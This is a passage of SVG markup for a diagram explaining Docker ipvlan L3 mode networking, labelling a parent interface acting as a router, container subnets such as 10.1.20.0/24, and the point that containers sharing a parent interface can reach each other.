5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,108,55)"><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="259" height="75" fill-opacity="0"/></g></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="259" height="45" fill-opacity="0"/></g></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="29" y="0" width="231" height="45" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="29" y="13">Unless</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="73" y="13">notified</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="118" y="13">about</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="154" y="13">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="176" y="13">container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="14" y="28">networks</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="66" y="28">,</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="73" y="28">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="95" y="28">physical</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="146" y="28">network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="195" y="28">does</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="227" y="28">not</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="47" y="43">have</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="79" y="43">a</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="90" y="43">route</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="123" y="43">to</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="137" y="43">their</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="166" y="43">subnets</text></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="45" width="259" height="15" fill-opacity="0"/></g></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="57" y="45" width="147" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="57" y="58">Who</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="89" y="58">has</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="115" y="58">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="129" y="58">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="133" y="58">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="147" y="58">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="151" y="58">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="165" y="58">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="169" y="58">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="176" y="58">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="180" y="58">24</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="194" y="58">?</text></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="60" width="259" height="15" fill-opacity="0"/></g></g><g transform="translate(146,210) matrix(1,0,0,1,0,0) translate(-146,-210)"><g><rect fill="rgb(0,0,0)" stroke="none" x="60" y="60" width="139" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="60" y="73">Who</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="92" y="73">has</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="118" y="73">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="133" y="73">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="136" y="73">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="144" y="73">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="147" y="73">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="162" y="73">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="165" y="73">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="172" y="73">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="176" y="73">24</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="191" y="73">?</text></g></g><g transform="matrix(1,0,0,1,9,404)"><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="439" height="18" fill-opacity="0"/></g></g><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="439" height="18" fill-opacity="0"/></g></g><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="431" height="17" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="4" y="15">Containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="86" y="15">can</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="116" y="15">be</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="139" y="15">on</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="161" y="15">different</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="223" y="15">subnets</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="284" y="15">and</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="315" y="15">reach</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="359" y="15">each</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="398" y="15">other</text></g></g><g transform="matrix(1,0,0,1,108,253)"><g transform="translate(153,0) matrix(1,0,0,1,0,0) translate(-153,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="235" height="22" fill-opacity="0"/></g></g><g transform="translate(153,0) matrix(1,0,0,1,0,0) translate(-153,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="235" height="22" fill-opacity="0"/></g></g><g transform="translate(153,0) matrix(1,0,0,1,0,0) translate(-153,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="42" y="0" width="70" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="48" y="19">Ipvlan</text></g><g transform="translate(153,0) matrix(1,0,0,1,0,0) translate(-153,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="111" y="0" width="82" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="111" y="19">L3</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="140" y="19">Mode</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,124,172)"><g transform="translate(4,4) scale(1.002415458937198,1.0104166666666667)"><g><g transform="translate(0,0) scale(2.07,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.48309178743961356,2.0833333333333335)"><path fill="#000000" stroke="none" d="M 10 0 L 196.99999999999997 0 Q 206.99999999999997 0 206.99999999999997 10 L 206.99999999999997 38 Q 206.99999999999997 48 196.99999999999997 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 196.99999999999997 0 Q 206.99999999999997 0 206.99999999999997 10 L 206.99999999999997 38 Q 206.99999999999997 48 196.99999999999997 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(2.07,0.48)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.48309178743961356,2.0833333333333335)"><path fill="#cccccc" stroke="none" d="M 10 0 L 196.99999999999997 0 Q 206.99999999999997 0 206.99999999999997 10 L 206.99999999999997 38 Q 206.99999999999997 48 196.99999999999997 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 196.99999999999997 0 Q 206.99999999999997 0 206.99999999999997 10 L 206.99999999999997 38 Q 206.99999999999997 48 196.99999999999997 48 L 10 48 Q 0 48 0 38 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,136,175)"><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="185" height="42" fill-opacity="0"/></g></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="185" height="14" fill-opacity="0"/></g></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="79" y="0" width="27" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="79" y="12">Eth0</text></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="185" height="14" fill-opacity="0"/></g></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="46" y="14" width="95" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="46" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="66" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="69" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="89" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="92" y="26">50</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="106" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="109" y="26">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="122" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="126" y="26">24</text></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="185" height="14" fill-opacity="0"/></g></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="3" y="28" width="179" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="3" y="40">Parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="42" y="40">interface</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="40">acts</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="117" y="40">as</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="133" y="40">a</text></g><g transform="translate(271,112) matrix(1,0,0,1,0,0) translate(-271,-112)"><g><rect fill="rgb(0,0,0)" stroke="none" x="143" y="28" width="40" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="143" y="40">Router</text></g></g><g transform="matrix(1,0,0,1,31,358)"><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="388" height="32" fill-opacity="0"/></g></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="388" height="16" fill-opacity="0"/></g></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="30" y="0" width="328" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="30" y="14">All</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="50" y="14">containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="118" y="14">can</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="145" y="14">ping</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="175" y="14">each</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="209" y="14">other</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="299" y="14">a</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="310" y="14">router</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="351" y="14">if</text></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="245" y="0" width="50" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="245" y="14">without</text></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="388" height="16" fill-opacity="0"/></g></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="31" y="16" width="328" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="31" y="30">they</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="61" y="30">share</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="100" y="30">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="163" y="30">parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="206" y="30">interface</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="260" y="30"> (</text></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="123" y="16" width="36" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="123" y="30">same</text></g><g transform="translate(698,64) matrix(1,0,0,1,0,0) translate(-698,-64)"><g><rect fill="rgb(0,0,0)" stroke="none" x="269" y="16" width="90" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="269" y="30">example</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="326" y="30">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="italic" font-weight="normal" text-decoration="" line-height="16.5px" x="353" y="30">)</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,320,296)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,310,286)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,300,276)"><g><g transform="translate(0,0) scale(1.14,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.8771929824561404,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 103.99999999999999 0 Q 113.99999999999999 0 113.99999999999999 10 L 113.99999999999999 46.99999999999999 Q 113.99999999999999 56.99999999999999 103.99999999999999 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,310,283)"><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="94" height="44" fill-opacity="0"/></g></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="94" height="14" fill-opacity="0"/></g></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="14" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="70" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="76" y="12">)</text></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="94" height="30" fill-opacity="0"/></g></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="34" y="14" width="73" height="30" fill-opacity="0"/></g></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="34" y="14" width="73" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="34" y="27">Eth0</text></g><g transform="translate(93,71) matrix(1,0,0,1,0,0) translate(-93,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="29" width="73" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="11" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="26" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="29" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="36" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="40" y="42">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="54" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="58" y="42">x</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="65" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" 